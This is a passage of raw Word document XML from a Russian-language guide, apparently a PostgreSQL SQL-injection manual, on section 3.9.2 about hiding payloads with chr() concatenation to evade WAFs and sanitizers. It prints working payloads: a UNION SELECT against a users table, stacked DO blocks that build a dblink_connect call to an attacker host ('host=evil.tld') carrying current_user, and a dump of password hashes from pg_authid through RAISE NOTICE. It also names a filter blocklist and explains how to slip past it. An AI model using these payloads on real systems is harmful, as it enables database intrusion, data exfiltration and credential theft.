        <w:t xml:space="preserve">. В тексте payload-а подстроки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нет — только числа. PG в рантайме конкатенирует и получает нужную строку.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Принципиальное ограничение: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">chr-конкатенация даёт строковое значение, не SQL-токен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Имена функций и таблиц парсер PG резолвит на этапе AST-build (до выполнения), поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT (chr(100)||chr(98)||...)('host=evil')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — не работает: парсер ждёт идентификатор, а не выражение. Чтобы использовать chr-результат как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">имя функции/таблицы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, его надо подать 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(только в plpgsql-контексте, см. Payload B) или в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format(..., ...)::regprocedure/::regclass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-каст.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — chr-литерал для значения (без DO-блока)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Применимо, когда фильтр блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">содержимое</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строкового литерала. Например, sanitizer запрещает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как substring в любом параметре.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст — поиск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE email = '{q}'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, фильтр блокирует литерал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 WHERE email = chr(97)||chr(100)||chr(109)||chr(105)||chr(110)||chr(64)||chr(99)||chr(111)||chr(46)||chr(99)||chr(111)||chr(109) --</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'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT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FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE email = chr(97)||chr(100)||chr(109)||chr(105)||chr(110)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">           ||chr(64)||chr(99)||chr(111)||chr(46)||chr(99)||chr(111)||chr(109) --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG считает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chr(97)||chr(100)||...</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'admin@co.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на этапе исполнения и подставляет в WHERE. WAF/sanitizer на стороне приложения не увидел этой строки — только числа 97, 100, 109 и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативные компактные формы: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Через `string_agg`:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  (SELECT string_agg(chr(c)::text, '') FROM unnest(ARRAY[97,100,109,105,110,64,99,111,46,99,111,109]) AS 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Через `convert_from + decode`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — рассматривается отдельно в 3.9.5 как самостоятельный приём (компактнее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-цепочки для длинных строк).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — chr для имени функции/таблицы (требует EXECUTE в DO)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Применимо, когда фильтр блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">имя функции/таблицы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. WAF из 3.9.0 блокирует подстроку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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Payload A здесь не поможет, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT chr(100)||chr(98)||...||'(...)'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> это не вызов функции, это строка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Решение: построить целую SQL-команду как chr-конкатенацию и подать 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внутри plpgsql DO-блока.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст — точка инъекции, допускающая stacked queries (например, через 3.5 в simple-protocol драйвере, или через payload в идентификаторе ORDER BY где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пропускается):</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1; DO $do$ BEGIN PERFORM dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(101)||chr(118)||chr(105)||chr(108)||chr(46)||chr(116)||chr(108)||chr(100)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||current_user||chr(32)||chr(100)||chr(98)||chr(110)||chr(97)||chr(109)||chr(101)||chr(61)||chr(120)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(120)); END $do$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Здесь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 единственное имя функции, которое всё-таки в тексте есть. Если WAF блокирует именно эту подстроку, нужно идти глубже — построить и сам вызов через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1; DO $do$ DECLARE conn text; BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  EXECUTE chr(83)||chr(69)||chr(76)||chr(69)||chr(67)||chr(84)||chr(32)||chr(100)||chr(98)||chr(108)||chr(105)||chr(110)||chr(107)||chr(95)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(40)||chr(39)||chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(101)||chr(118)||chr(105)||chr(108)||chr(39)||chr(41);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END $do$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Где chr-цепочка после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собирается в строку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT dblink_connect('host=evil')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Парсер PG никогда не видит подстроки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 только числовые литералы и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(которое в большинстве WAF-rule-set не блочится, потому что слишком много false positives).</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FROM articles ORDER BY ... LIMIT 10;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $do$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DECLARE conn text;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EXECUTE chr(83)||chr(69)||...||chr(41);  -- == 'SELECT dblink_connect(''host=evil'')'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END $do$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG парсит DO-блок, plpgsql-исполнитель в рантайме конкатенирует chr-ы в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT dblink_connect('host=evil')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и динамически исполняет — обычный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plpgsql, для парсера PG в момент чтения payload-а никаких опасных подстрок нет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Тот же приём работает для извлечения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1; DO $do$ DECLARE r record; BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  FOR r IN EXECUTE $sql$SELECT rolname, $sql$||chr(114)||chr(111)||chr(108)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||$sql$ FROM $sql$||chr(112)||chr(103)||chr(95)||chr(97)||chr(117)||chr(116)||chr(104)||chr(105)||chr(100)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  LOOP RAISE NOTICE $$%$$, r; END LOOP;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END $do$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Где chr-цепочки собирают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результат через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RAISE NOTICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> уходит в error-канал клиента (см. error-based в 3.2). Здесь скомбинированы 3.9.1 (dollar-quote </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$sql$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$do$</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3.9.2 (chr) и 3.5 (DO как stacked-bypass).</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Regex-фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\b(dblink|pg_read|pg_authid|...)\w*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ищет литеральные подстроки в тексте payload-а. Числовая последовательность </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chr(112)||chr(103)||chr(95)||chr(97)||chr(117)||chr(116)||chr(104)||chr(105)||chr(100)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не содержит подстроки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regex её не находит.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Sanitizer-blacklist в коде (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if "pg_authid" in q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — то же: подстроки нет.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Случай: WAF делает statistical-анализ (slang: «слишком много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в payload»). Современные WAF (Cloudflare bot detection, Imperva ML-mode) учитывают такие метрики, но классический regex-WAF — нет.</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chr(N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — built-in функция, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
